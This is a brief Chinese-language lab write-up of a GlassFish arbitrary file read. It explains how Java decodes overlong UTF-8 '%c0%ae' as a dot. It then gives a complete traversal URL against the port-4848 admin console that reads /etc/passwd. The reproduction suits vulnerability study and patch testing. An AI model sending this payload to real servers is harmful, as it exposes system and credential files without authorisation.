GlassFish 任意檔案讀取漏洞
by ADummy
0x00利用路線
直接url執行payload
0x01漏洞介紹
java語言中會把
%c0%ae
解析為
\uC0AE
,最後轉義為ASCCII字元的
.
(點)。利用
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/
來向上跳轉,達到目錄穿越、任意檔案讀取的效果。。
0x02漏洞複現
環境運作後,通路
http://your-ip:8080
和
http://your-ip:4848
即可檢視web頁面。其中,8080端口是網站内容,4848端口是GlassFish管理中心。
通路
https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
,發現已成功讀取
/etc/passwd
内容:
payload:
`https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd`